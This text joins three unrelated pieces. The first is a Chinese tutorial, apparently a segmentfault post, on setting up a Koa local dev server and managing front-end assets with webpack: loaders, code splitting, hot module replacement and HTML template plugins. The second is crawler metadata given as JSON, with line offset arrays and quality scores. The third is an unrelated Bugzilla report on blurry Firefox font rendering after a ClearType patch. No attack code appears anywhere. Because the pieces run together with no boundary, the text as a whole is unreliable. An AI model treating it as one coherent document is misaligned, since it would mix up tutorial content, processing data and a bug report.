app = http.createServer(app.callback());
app.listen(3005, '0.0.0.0', function() {
console.log('app listen success.');
});
运行node app启动本地server,浏览器输入http://localhost:3005/a.html即可看到页面内容,最基本的环境就算搭建完成。
如果只是处理静态资源请求,可以有很多的替代方案,如Fiddler替换文件、本地起Nginx服务器等等。搭建一个Web服务器,个性化地定制开发环境用于提升开发效率,如处理动态请求、dnsproxy(多用于解决移动端配置host的问题)等,总之local webserver拥有无限的可能。
定制动态请求
我们的local server是localhost域,在ajax请求时为了突破前端同源策略的限制,本地server需支持代理其他域下的api的功能,即proxy。同时还要支持对未完成的api进行mock的功能。
// app.js
var router = require('koa-router')();
var routes = require('./routes');
routes(router, app);
app.use(router.routes());
// routes.js
var proxy = require('koa-proxy');
var list = require('./mock/list');
module.exports = function(router, app) {
// mock api
// 可以根据需要任意定制接口的返回
router.get('/api/list', function*() {
var query = this.query || {};
var offset = query.offset || 0;
var limit = query.limit || 10;
var diff = limit - list.length;
if(diff <= 0) {
this.body = {code: 0, data: list.slice(0, limit)};
} else {
var arr = list.slice(0, list.length);
var i = 0;
while(diff--) arr.push(arr[i++]);
this.body = {code: 0, data: arr};
}
});
// proxy api
router.get('/api/foo/bar', proxy({url: 'http://foo.bar.com'}));
}
webpack资源管理
资源的获取
ECMAScript 6之前,前端的模块化一直没有统一的标准,仅前端包管理系统就有好几个。所以任何一个库实现的loader都不得不去兼容基于多种模块化标准开发的模块。
webpack同时提供了对CommonJS、AMD和ES6模块化标准的支持,对于非前三种标准开发的模块,webpack提供了shimming modules的功能。
受Node.js的影响,越来越多的前端开发者开始采用CommonJS作为模块开发标准,npm已经逐渐成为前端模块的托管平台,这大大降低了前后端模块复用的难度。
在webpack配置项里,可以把node_modules路径添加到resolve search root列表里边,这样就可以直接load npm模块了:
// webpack.config.js
resolve: {
root: [process.cwd() + '/src', process.cwd() + '/node_modules'],
alias: {},
extensions: ['', '.js', '.css', '.scss', '.ejs', '.png', '.jpg']
},
$ npm install jquery react --save
// page-x.js
import $ from 'jquery';
import React from 'react';
资源引用
根据webpack的设计理念,所有资源都是“模块”,webpack内部实现了一套资源加载机制,这与Requirejs、Sea.js、Browserify等实现有所不同,除了借助插件体系加载不同类型的资源文件之外,webpack还对输出结果提供了非常精细的控制能力,开发者只需要根据需要调整参数即可:
// webpack.config.js
// webpack loaders的配置示例
...
loaders: [
{
test: /\.(jpe?g|png|gif|svg)$/i,
loaders: [
'image?{bypassOnDebug: true, progressive:true, \
optimizationLevel: 3, pngquant:{quality: "65-80"}}',
'url?limit=10000&name=img/[hash:8].[name].[ext]',
]
},
{
test: /\.(woff|eot|ttf)$/i,
loader: 'url?limit=10000&name=fonts/[hash:8].[name].[ext]'
},
{test: /\.(tpl|ejs)$/, loader: 'ejs'},
{test: /\.js$/, loader: 'jsx'},
{test: /\.css$/, loader: 'style!css'},
{test: /\.scss$/, loader: 'style!css!scss'},
]
...
简单解释下上面的代码,test项表示匹配的资源类型,loaderloaders项表示用来加载这种类型的资源的loader,loader的使用可以参考using loaders,更多的loader可以参考list of loaders
对于开发者来说,使用loader很简单,最好先配置好特定类型的资源对应的loaders,在业务代码直接使用webpack提供的require(source path)接口即可:
// a.js
// 加载css资源
require('../css/a.css');
// 加载其他js资源
var foo = require('./widgets/foo');
var bar = require('./widgets/bar');
// 加载图片资源
var loadingImg = require('../img/loading.png');
var img = document.createElement('img');
img.src = loadingImg;
注意,require()还支持在资源path前面指定loader,即require(![loaders list]![source path])形式:
require("!style!css!less!bootstrap/less/bootstrap.less");
// “bootstrap.less”这个资源会先被"less-loader"处理,
// 其结果又会被"css-loader"处理,接着是"style-loader"
// 可类比pipe操作
require()时指定的loader会覆盖配置文件里对应的loader配置项。
资源依赖处理
通过loader机制,可以不需要做额外的转换即可加载浏览器不直接支持的资源类型,如.scss.less.json.ejs等。
但是对于css、js和图片,采用webpack加载和直接采用标签引用加载,有何不同呢?
运行webpack的打包命令,可以得到a.js的输出的结果:
webpackJsonp([0], {
/***/0:
/***/function(module, exports, __webpack_require__) {
__webpack_require__(6);
var foo = __webpack_require__(25);
var bar = __webpack_require__(26);
var loadingImg = __webpack_require__(24);
var img = document.createElement('img');
img.src = loadingImg;
},
/***/6:
/***/function(module, exports, __webpack_require__) {
...
},
/***/7:
/***/function(module, exports, __webpack_require__) {
...
},
/***/24:
/***/function(module, exports) {
...
},
/***/25:
/***/function(module, exports) {
...
},
/***/26:
/***/function(module, exports) {
...
}
});
从输出结果可以看到,webpack内部实现了一个全局的webpackJsonp()用于加载处理后的资源,并且webpack把资源进行重新编号,每一个资源成为一个模块,对应一个id,后边是模块的内部实现,而这些操作都是webpack内部处理的,使用者无需关心内部细节甚至输出结果。
上面的输出代码,因篇幅限制删除了其他模块的内部实现细节,完整的输出请看a.out.js,来看看图片的输出:
/***/24:
/***/function(module, exports) {
module.exports = "data:image/png;base64,...";
/***/
}
注意到图片资源的loader配置:
{
test: /\.(jpe?g|png|gif|svg)$/i,
loaders: [
'image?...',
'url?limit=10000&name=img/[hash:8].[name].[ext]',
]
}
意思是,图片资源在加载时先压缩,然后当内容size小于~10KB时,会自动转成base64的方式内嵌进去,这样可以减少一个HTTP的请求。当图片大于10KB时,则会在img/下生成压缩后的图片,命名是[hash:8].[name].[ext]的形式。hash:8的意思是取图片内容hashsum值的前8位,这样做能够保证引用的是图片资源的最新修改版本,保证浏览器端能够即时更新。
对于css文件,默认情况下webpack会把css content内嵌到js里边,运行时会使用style标签内联。如果希望将css使用link标签引入,可以使用ExtractTextPlugin插件进行提取。
资源的编译输出
webpack的三个概念:模块(module)、入口文件(entry)、分块(chunk)。
其中,module指各种资源文件,如js、css、图片、svg、scss、less等等,一切资源皆被当做模块。
webpack编译输出的文件包括以下2种:
• entry:入口,可以是一个或者多个资源合并而成,由html通过script标签引入
• chunk:被entry所依赖的额外的代码块,同样可以包含一个或者多个文件
下面是一段entry和output项的配置示例:
entry: {
a: './src/js/a.js'
},
output: {
path: path.resolve(debug ? '__build' : './assets/'),
filename: debug ? '[name].js' : 'js/[chunkhash:8].[name].min.js',
chunkFilename: debug ? '[chunkhash:8].chunk.js' : 'js/[chunkhash:8].chunk.min.js',
publicPath: debug ? '/__build/' : ''
}
其中entry项是入口文件路径映射表,output项是对输出文件路径和名称的配置,占位符如[id][chunkhash][name]等分别代表编译后的模块id、chunk的hashnum值、chunk名等,可以任意组合决定最终输出的资源格式。hashnum的做法,基本上弱化了版本号的概念,版本迭代的时候chunk是否更新只取决于chnuk的内容是否发生变化。
细心的同学可能会有疑问,entry表示入口文件,需要手动指定,那么chunk到底是什么,chunk是怎么生成的?
在开发webapp时,总会有一些功能是使用过程中才会用到的,出于性能优化的需要,对于这部分资源我们希望做成异步加载,所以这部分的代码一般不用打包到入口文件里边。
对于这一点,webpack提供了非常好的支持,即code splitting,即使用require.ensure()作为代码分割的标识。
例如某个需求场景,根据url参数,加载不同的两个UI组件,示例代码如下:
var component = getUrlQuery('component');
if('dialog' === component) {
require.ensure([], function(require) {
var dialog = require('./components/dialog');
// todo ...
});
}
if('toast' === component) {
require.ensure([], function(require) {
var toast = require('./components/toast');
// todo ...
});
}
url分别输入不同的参数后得到瀑布图:
code_splitting1
code_splitting2
webpack将require.ensure()包裹的部分单独打包了,即图中看到的[hash].chunk.js,既解决了异步加载的问题,又保证了加载到的是最新的chunk的内容。
假设app还有一个入口页面b.html,那麽就需要相应的再增加一个入口文件b.js,直接在entry项配置即可。多个入口文件之间可能公用一个模块,可以使用CommonsChunkPlugin插件对指定的chunks进行公共模块的提取,下面代码示例演示提取所有入口文件公用的模块,将其独立打包:
var chunks = Object.keys(entries);
plugins: [
new CommonsChunkPlugin({
name: 'vendors', // 将公共模块提取,生成名为`vendors`的chunk
chunks: chunks,
minChunks: chunks.length // 提取所有entry共同依赖的模块
})
],
资源的实时更新
引用模块,webpack提供了require()API(也可以通过添加bable插件来支持ES6的import语法)。但是在开发阶段不可能改一次编译一次,webpack提供了强大的热更新支持,即HMR(hot module replace)
HMR简单说就是webpack启动一个本地webserver(webpack-dev-server),负责处理由webpack生成的静态资源请求。注意webpack-dev-server是把所有资源存储在内存的,所以你会发现在本地没有生成对应的chunk访问却正常。
下面这张来自webpack官网的图片,可以很清晰地说明moduleentrychunk三者的关系以及webpack如何实现热更新的:
HMR
enter0表示入口文件,chunk1~4分别是提取公共模块所生成的资源块,当模块4和9发生改变时,因为模块4被打包在chunk1中,模块9打包在chunk3中,所以HMR runtime会将变更部分同步到chunk1和chunk3中对应的模块,从而达到hot replace。
webpack-dev-server的启动很简单,配置完成之后可以通过cli启动,然后在页面引入入口文件时添加webpack-dev-server的host即可将HMR集成到已有服务器:
...
<body>
...
<script src="http://localhost:3005/__build/vendors.js"></script>
<script src="http://localhost:3005/__build/a.js"></script>
</body>
...
因为我们的local server就是基于Node.js的webserver,这里可以更进一步,将webpack开发服务器以中间件的形式集成到local webserver,不需要cli方式启动(少开一个cmd tab):
// app.js
var webpackDevMiddleware = require('koa-webpack-dev-middleware');
var webpack = require('webpack');
var webpackConf = require('./webpack.config');
app.use(webpackDevMiddleware(webpack(webpackConf), {
contentBase: webpackConf.output.path,
publicPath: webpackConf.output.publicPath,
hot: true,
stats: webpackConf.devServer.stats
}));
启动HMR之后,每次保存都会重新编译生成新的chnuk,通过控制台的log,可以很直观地看到这一过程:
HMR build
公用代码的处理:封装组件
webpack解决了资源依赖的问题,这使得封装组件变得很容易,例如:
// js/components/component-x.js
require('./component-x.css');
// @see https://github.com/okonet/ejs-loader
var template = require('./component-x.ejs');
var str = template({foo: 'bar'});
function someMethod() {}
exports.someMethod = someMethod;
使用:
// js/a.js
import {someMethod} from "./components/component-x";
someMethod();
正如开头所说,将三种语言、多种资源合并成js来管理,大大降低了维护成本。
对于新开发的组件或library,建议推送到npm仓库进行共享。如果需要支持其他加载方式(如RequireJS或标签直接引入),可以参考webpack提供的externals项。
资源路径切换
由于入口文件是手动使用script引入的,在webpack编译之后入口文件的名称和路径一般会改变,即开发环境和生产环境引用的路径不同:
// 开发环境
// a.html
<script src="/__build/vendors.js"></script>
<script src="/__build/a.js"></script>
// 生产环境
// a.html
<script src="http://cdn.site.com/js/460de4b8.vendors.min.js"></script>
<script src="http://cdn.site.com/js/e7d20340.a.min.js"></script>
webpack提供了HtmlWebpackPlugin插件来解决这个问题,HtmlWebpackPlugin支持从模板生成html文件,生成的html里边可以正确解决js打包之后的路径、文件名问题,配置示例:
// webpack.config.js
plugins: [
new HtmlWebpackPlugin({
template: './src/a.html',
filename: 'a',
inject: 'body',
chunks: ['vendors', 'a']
})
]
这里资源根路径的配置在output项:
// webpack.config.js
output: {
...
publicPath: debug ? '/__build/' : 'http://cdn.site.com/'
}
其他入口html文件采用类似处理方式。
辅助工具集成
local server解决本地开发环境的问题,webpack解决开发和生产环境资源依赖管理的问题。在项目开发中,可能会有许多额外的任务需要完成,比如对于使用compass生成sprites的项目,因目前webpack还不直接支持sprites,所以还需要compass watch,再比如工程的远程部署等,所以需要使用一些构建工具或者脚本的配合,打通研发的链路。
因为每个团队在部署代码、单元测试、自动化测试、发布等方面做法都不同,前端需要遵循公司的标准进行自动化的整合,这部分不深入了。
对比&综述
前端工程化的建设,早期的做法是使用Grunt、Gulp等构建工具。但本质上它们只是一个任务调度器,将功能独立的任务拆解出来,按需组合运行任务。如果要完成前端工程化,这两者配置门槛很高,每一个任务都需要开发者自行使用插件解决,而且对于资源的依赖管理能力太弱。
在国内,百度出品的fis也是一种不错的工程化工具的选择,fis内部也解决了资源依赖管理的问题。因笔者没有在项目中实践过fis,所以不进行更多的评价。
webpack以一种非常优雅的方式解决了前端资源依赖管理的问题,它在内部已经集成了许多资源依赖处理的细节,但是对于使用者而言只需要做少量的配置,再结合构建工具,很容易搭建一套前端工程解决方案。
基于webpack的前端自动化工具,可以自由组合各种开源技术栈(Koa/Express/其他web框架、webpack、Sass/Less/Stylus、Gulp/Grunt等),没有复杂的资源依赖配置,工程结构也相对简单和灵活。
附上笔者根据本篇的理论所完成的一个前端自动化解决方案项目模板:
webpack-seed
(完)。
一只养喵的程序员。
3.4k 声望
249 粉丝
0 条评论
推荐阅读
【译】React 组件的生命周期
原文:[链接] 译者序:React组件生命周期有很多文章介绍了,这篇作者列出了很多开发中可能不会注意的细节,比如哪些阶段执行setState是否会导致render等,对React组件性能优化有一定的帮助,故译之,不当之处敬请...
dmyang8阅读 9.1k评论 1
耗时一年半才出第一版,这个工具会一统前端么?
大家好,我卡颂。前端领域从不缺少热点,基本每过半年,就会出现新的工具。在这样快节奏的浪潮中,有个工具却显得格格不入,他就是Rome。从名字中我们就能窥探出一丝端倪,看看别的工具:vite(法语中快的的意思...
卡颂3阅读 1.2k评论 1
封面图
Turbopack 发布后的各方反应:Vite/Webpack/围观群众
上周整理了一下 Turbopack 发布后的各方反应,以便让自己和各位同学下一步做决策的时候能有所参考。接着忙碌的一周过去,我发现博客这周还没更,于是赶紧来补一下。
Meathill6阅读 859评论 1
封面图
从2022看2023年前端发展趋势
时光荏苒,回望即将过去的2022年,前端领域在这一年中整体还是保持平稳向前,但对整个IT产业链路及互联网行业来说,变化还是很大的,下面我将简单分享一下个人对整个行业领域的一些观点与思考。鄙人才疏学浅,难...
维李设论3阅读 2k
封面图
WebPack面试题汇总
现在的前端网页功能丰富,特别是SPA(single page web application 单页应用)技术流行后,JavaScript的复杂度增加和需要一大堆依赖包,还需要解决Scss、Less……新增样式的扩展写法的编译工作。Webpack 最核心的功...
xiangzhihong5阅读 246
想弄懂Babel?你必须得先弄清楚这几个包
相信很多人都知道Babel,知道它是用来编译ES6+的东西。但是再深入一点,大家都清楚我们平时项目中Babel用到的那些包作用是什么吗?为什么要用那几个包?
limingcan1阅读 580
封面图
前端微服务跨域配置解决办法,devServer为例
前言Nginx: 在上一篇我提到的跨域配置是正式上线的时候使用nginx做为配置的参考。Webpack: 而我们更多的时候是在开发阶段就需要通过跨域进行联合开发各个子应用部分功能DevServer配置解决跨域子应用静态资源跨域...
smallStone1阅读 1.1k评论 4
一只养喵的程序员。
3.4k 声望
249 粉丝
宣传栏
|
{
"url": "https://segmentfault.com/a/1190000003499526",
"source_domain": "segmentfault.com",
"snapshot_id": "CC-MAIN-2023-06",
"warc_metadata": {
"Content-Length": "87601",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:CKLC22COWQF2LW6C5LIREDORC6CQN3PC",
"WARC-Concurrent-To": "<urn:uuid:f8e157bd-0387-41b8-a044-127959629cf2>",
"WARC-Date": "2023-02-05T03:53:32Z",
"WARC-IP-Address": "59.110.246.251",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:3KO4QP4VQUWJZMVWVHFN77XY6FSK7QCU",
"WARC-Record-ID": "<urn:uuid:e7e94c8d-ee43-4d6d-b1a4-ebaf0d9378f8>",
"WARC-Target-URI": "https://segmentfault.com/a/1190000003499526",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:37bb6319-a1be-4e6e-a210-915a30c2ad1b>"
},
"warc_info": "isPartOf: CC-MAIN-2023-06\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for January/February 2023\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-78\r\nsoftware: Apache Nutch 1.19 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.4-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
22,
23,
76,
77,
130,
131,
221,
222,
229,
230,
250,
251,
290,
291,
321,
322,
347,
348,
390,
391,
437,
438,
496,
497,
527,
528,
549,
550,
653,
654,
695,
696,
712,
719,
726,
752,
795,
803,
810,
833,
868,
876,
884,
885,
958,
959,
1061,
1062,
1149,
1150,
1168,
1169,
1224,
1225,
1326,
1327,
1348,
1349,
1378,
1379,
1418,
1419,
1471,
1472,
1497,
1498,
1576,
1577,
1614,
1615,
1624,
1625,
1632,
1633,
1669,
1700,
1734,
1773,
1817,
1852,
1884,
1919,
1954,
1989,
2024,
2056,
2090,
2132,
2173,
2211,
2249,
2288,
2324,
2360,
2397,
2432,
2468,
2500,
2537,
2570,
2608,
2643,
2674,
2705,
2706,
2831,
2832,
2839,
2840,
2902,
2903,
2913,
2941,
2967,
3002,
3003,
3020,
3071,
3091,
3131,
3132,
3147,
3197,
3211,
3216,
3217,
3258,
3259,
3300,
3340,
3344,
3345,
3422,
3423,
3567,
3568,
3575,
3576,
3682,
3683,
3693,
3731,
3765,
3786,
3812,
3825,
3859,
3894,
3935,
3951,
3974,
4016,
4054,
4094,
4133,
4173,
4174,
4198,
4261,
4278,
4328,
4351,
4352,
4398,
4399,
4445,
4455,
4463,
4464,
4481,
4549,
4551,
4552,
4564,
4565,
4571,
4572,
4656,
4657,
4740,
4741,
4821,
4822,
4899,
4900,
4921,
4932,
5001,
5016,
5085,
5088,
5122,
5135,
5159,
5186,
5187,
5192,
5193,
5343,
5344,
5365,
5389,
5393,
5404,
5410,
5451,
5470,
5531,
5600,
5662,
5672,
5679,
5685,
5721,
5788,
5795,
5838,
5874,
5917,
5966,
5968,
5972,
5973,
6090,
6091,
6180,
6181,
6189,
6200,
6225,
6226,
6238,
6274,
6310,
6311,
6321,
6369,
6370,
6411,
6412,
6434,
6435,
6511,
6512,
6570,
6613,
6655,
6668,
6669,
6710,
6711,
6718,
6719,
6782,
6783,
6827,
6828,
6859,
6860,
6880,
6892,
6950,
6951,
6983,
6984,
7027,
7070,
7071,
7121,
7170,
7171,
7201,
7208,
7209,
7221,
7279,
7291,
7298,
7299,
7311,
7369,
7381,
7388,
7389,
7402,
7439,
7451,
7458,
7459,
7472,
7509,
7521,
7528,
7529,
7542,
7579,
7591,
7597,
7601,
7602,
7742,
7743,
7797,
7798,
7807,
7840,
7841,
7891,
7892,
7902,
7904,
7905,
7923,
7924,
7926,
7963,
7978,
7999,
8057,
8063,
8065,
8066,
8256,
8257,
8362,
8363,
8371,
8372,
8419,
8420,
8476,
8477,
8499,
8500,
8547,
8548,
8590,
8591,
8616,
8617,
8626,
8649,
8652,
8662,
8719,
8789,
8876,
8917,
8919,
8920,
9101,
9102,
9159,
9160,
9241,
9242,
9311,
9312,
9349,
9350,
9392,
9393,
9422,
9465,
9518,
9538,
9546,
9548,
9549,
9577,
9620,
9671,
9691,
9699,
9701,
9702,
9722,
9723,
9739,
9740,
9756,
9757,
9848,
9849,
9996,
9997,
10032,
10033,
10044,
10073,
10129,
10153,
10206,
10213,
10216,
10217,
10225,
10226,
10347,
10348,
10482,
10483,
10550,
10551,
10555,
10556,
10696,
10697,
10791,
10792,
10796,
10803,
10811,
10880,
10943,
10951,
10955,
10956,
11068,
11069,
11079,
11145,
11179,
11226,
11227,
11280,
11322,
11369,
11384,
11423,
11428,
11429,
11481,
11482,
11492,
11493,
11506,
11507,
11542,
11543,
11575,
11605,
11606,
11651,
11696,
11730,
11731,
11756,
11757,
11790,
11791,
11795,
11796,
11807,
11860,
11874,
11875,
11912,
11913,
12003,
12004,
12011,
12012,
12080,
12081,
12089,
12099,
12143,
12181,
12189,
12199,
12270,
12335,
12336,
12441,
12442,
12463,
12474,
12502,
12536,
12559,
12583,
12616,
12623,
12625,
12626,
12646,
12647,
12668,
12678,
12686,
12747,
12749,
12750,
12770,
12771,
12778,
12779,
12962,
12963,
13026,
13027,
13033,
13034,
13163,
13164,
13239,
13240,
13337,
13338,
13454,
13455,
13487,
13500,
13501,
13506,
13507,
13508,
13518,
13519,
13527,
13534,
13540,
13545,
13562,
13678,
13679,
13698,
13699,
13722,
13828,
13829,
13844,
13845,
13849,
13886,
13969,
13970,
13990,
13991,
13995,
14013,
14118,
14119,
14130,
14131,
14135,
14148,
14280,
14281,
14301,
14302,
14324,
14403,
14404,
14421,
14422,
14426,
14452,
14569,
14570,
14593,
14594,
14604,
14605,
14613,
14620
],
"line_end_idx": [
22,
23,
76,
77,
130,
131,
221,
222,
229,
230,
250,
251,
290,
291,
321,
322,
347,
348,
390,
391,
437,
438,
496,
497,
527,
528,
549,
550,
653,
654,
695,
696,
712,
719,
726,
752,
795,
803,
810,
833,
868,
876,
884,
885,
958,
959,
1061,
1062,
1149,
1150,
1168,
1169,
1224,
1225,
1326,
1327,
1348,
1349,
1378,
1379,
1418,
1419,
1471,
1472,
1497,
1498,
1576,
1577,
1614,
1615,
1624,
1625,
1632,
1633,
1669,
1700,
1734,
1773,
1817,
1852,
1884,
1919,
1954,
1989,
2024,
2056,
2090,
2132,
2173,
2211,
2249,
2288,
2324,
2360,
2397,
2432,
2468,
2500,
2537,
2570,
2608,
2643,
2674,
2705,
2706,
2831,
2832,
2839,
2840,
2902,
2903,
2913,
2941,
2967,
3002,
3003,
3020,
3071,
3091,
3131,
3132,
3147,
3197,
3211,
3216,
3217,
3258,
3259,
3300,
3340,
3344,
3345,
3422,
3423,
3567,
3568,
3575,
3576,
3682,
3683,
3693,
3731,
3765,
3786,
3812,
3825,
3859,
3894,
3935,
3951,
3974,
4016,
4054,
4094,
4133,
4173,
4174,
4198,
4261,
4278,
4328,
4351,
4352,
4398,
4399,
4445,
4455,
4463,
4464,
4481,
4549,
4551,
4552,
4564,
4565,
4571,
4572,
4656,
4657,
4740,
4741,
4821,
4822,
4899,
4900,
4921,
4932,
5001,
5016,
5085,
5088,
5122,
5135,
5159,
5186,
5187,
5192,
5193,
5343,
5344,
5365,
5389,
5393,
5404,
5410,
5451,
5470,
5531,
5600,
5662,
5672,
5679,
5685,
5721,
5788,
5795,
5838,
5874,
5917,
5966,
5968,
5972,
5973,
6090,
6091,
6180,
6181,
6189,
6200,
6225,
6226,
6238,
6274,
6310,
6311,
6321,
6369,
6370,
6411,
6412,
6434,
6435,
6511,
6512,
6570,
6613,
6655,
6668,
6669,
6710,
6711,
6718,
6719,
6782,
6783,
6827,
6828,
6859,
6860,
6880,
6892,
6950,
6951,
6983,
6984,
7027,
7070,
7071,
7121,
7170,
7171,
7201,
7208,
7209,
7221,
7279,
7291,
7298,
7299,
7311,
7369,
7381,
7388,
7389,
7402,
7439,
7451,
7458,
7459,
7472,
7509,
7521,
7528,
7529,
7542,
7579,
7591,
7597,
7601,
7602,
7742,
7743,
7797,
7798,
7807,
7840,
7841,
7891,
7892,
7902,
7904,
7905,
7923,
7924,
7926,
7963,
7978,
7999,
8057,
8063,
8065,
8066,
8256,
8257,
8362,
8363,
8371,
8372,
8419,
8420,
8476,
8477,
8499,
8500,
8547,
8548,
8590,
8591,
8616,
8617,
8626,
8649,
8652,
8662,
8719,
8789,
8876,
8917,
8919,
8920,
9101,
9102,
9159,
9160,
9241,
9242,
9311,
9312,
9349,
9350,
9392,
9393,
9422,
9465,
9518,
9538,
9546,
9548,
9549,
9577,
9620,
9671,
9691,
9699,
9701,
9702,
9722,
9723,
9739,
9740,
9756,
9757,
9848,
9849,
9996,
9997,
10032,
10033,
10044,
10073,
10129,
10153,
10206,
10213,
10216,
10217,
10225,
10226,
10347,
10348,
10482,
10483,
10550,
10551,
10555,
10556,
10696,
10697,
10791,
10792,
10796,
10803,
10811,
10880,
10943,
10951,
10955,
10956,
11068,
11069,
11079,
11145,
11179,
11226,
11227,
11280,
11322,
11369,
11384,
11423,
11428,
11429,
11481,
11482,
11492,
11493,
11506,
11507,
11542,
11543,
11575,
11605,
11606,
11651,
11696,
11730,
11731,
11756,
11757,
11790,
11791,
11795,
11796,
11807,
11860,
11874,
11875,
11912,
11913,
12003,
12004,
12011,
12012,
12080,
12081,
12089,
12099,
12143,
12181,
12189,
12199,
12270,
12335,
12336,
12441,
12442,
12463,
12474,
12502,
12536,
12559,
12583,
12616,
12623,
12625,
12626,
12646,
12647,
12668,
12678,
12686,
12747,
12749,
12750,
12770,
12771,
12778,
12779,
12962,
12963,
13026,
13027,
13033,
13034,
13163,
13164,
13239,
13240,
13337,
13338,
13454,
13455,
13487,
13500,
13501,
13506,
13507,
13508,
13518,
13519,
13527,
13534,
13540,
13545,
13562,
13678,
13679,
13698,
13699,
13722,
13828,
13829,
13844,
13845,
13849,
13886,
13969,
13970,
13990,
13991,
13995,
14013,
14118,
14119,
14130,
14131,
14135,
14148,
14280,
14281,
14301,
14302,
14324,
14403,
14404,
14421,
14422,
14426,
14452,
14569,
14570,
14593,
14594,
14604,
14605,
14613,
14620,
14623
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 14623,
"ccnet_original_nlines": 567,
"rps_doc_curly_bracket": 0.005744379945099354,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.026334520429372787,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.007829179987311363,
"rps_doc_frac_lines_end_with_ellipsis": 0.03169013932347298,
"rps_doc_frac_no_alph_words": 0.6362989544868469,
"rps_doc_frac_unique_words": 0.6907692551612854,
"rps_doc_mean_word_length": 16.6784610748291,
"rps_doc_num_sentences": 224,
"rps_doc_symbol_to_word_ratio": 0.018861209973692894,
"rps_doc_unigram_entropy": 5.822506427764893,
"rps_doc_word_count": 650,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.011991510167717934,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.013559630140662193,
"rps_doc_frac_chars_top_3gram": 0.009685450233519077,
"rps_doc_frac_chars_top_4gram": 0.0031362399458885193,
"rps_doc_books_importance": -1052.654296875,
"rps_doc_books_importance_length_correction": -1052.654296875,
"rps_doc_openwebtext_importance": -523.3255615234375,
"rps_doc_openwebtext_importance_length_correction": -523.3255615234375,
"rps_doc_wikipedia_importance": -519.7958374023438,
"rps_doc_wikipedia_importance_length_correction": -519.7958374023438
},
"fasttext": {
"dclm": 0.8154969811439514,
"english": 0.02645743079483509,
"fineweb_edu_approx": 3.122119903564453,
"eai_general_math": 0.15492898225784302,
"eai_open_web_math": 0.018681470304727554,
"eai_web_code": 0.8918935656547546
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.452",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "005.1",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "23",
"label": "Tutorial"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
3,422,893,308,177,673,700
|
Closed Bug 1568841 Opened 2 years ago Closed 2 years ago
Blurry font rendering after landing patch from bug #1553818
Categories
(Core :: Graphics: Text, defect, P1)
70 Branch
All
Windows
defect
Tracking
()
VERIFIED FIXED
mozilla70
Tracking Status
firefox-esr60 --- unaffected
firefox-esr68 --- unaffected
firefox68 --- unaffected
firefox69 + verified
firefox70 + verified
People
(Reporter: Virtual, Assigned: lsalzman)
References
(Regression)
Details
(5 keywords)
Attachments
(11 files)
11.06 KB, text/plain
Details
115.92 KB, image/png
Details
116.59 KB, image/png
Details
14.45 KB, text/plain
Details
47 bytes, text/x-phabricator-request
Details | Review
47 bytes, text/x-phabricator-request
Details | Review
68.79 KB, image/png
Details
62.88 KB, image/png
Details
85.51 KB, image/png
Details
82.04 KB, image/png
Details
120.20 KB, image/png
Details
STR:
1. Open about:support or any Firefox menu
and see that font is blurry
Could you copy-paste the graphics section og your about:support page here?
Flags: needinfo?(Virtual)
Also, finding a regression range with mozregression would be super helpful.
@ Lee Salzman [:lsalzman] - Could you please look on this issue, as your patch caused it. Thanks!
Flags: needinfo?(Virtual) → needinfo?(lsalzman)
Regressed by: 1553818
Summary: Mozilla Firefox Nightly 70.0a1 (2019-07-25) has blurry font rendering → Blurry font rendering after landing patch from bug #1553818
Regression caused by:
Bug 1553818 - use GDI ClearType contrast for GDI font gamma. r=jrmuizel
Differential Revision:
https://phabricator.services.mozilla.com/D39101
Has Regression Range: --- → yes
OS: Windows 7 → Windows
Hardware: x86_64 → Desktop
Version: 67 Branch → 70 Branch
Could you post "before" and "after" screenshots showing the regression you're seeing? There's so much variation among graphics and rendering systems that it's hard to be sure whether Lee or other developers will be seeing the same results as you.
Attached file about:support
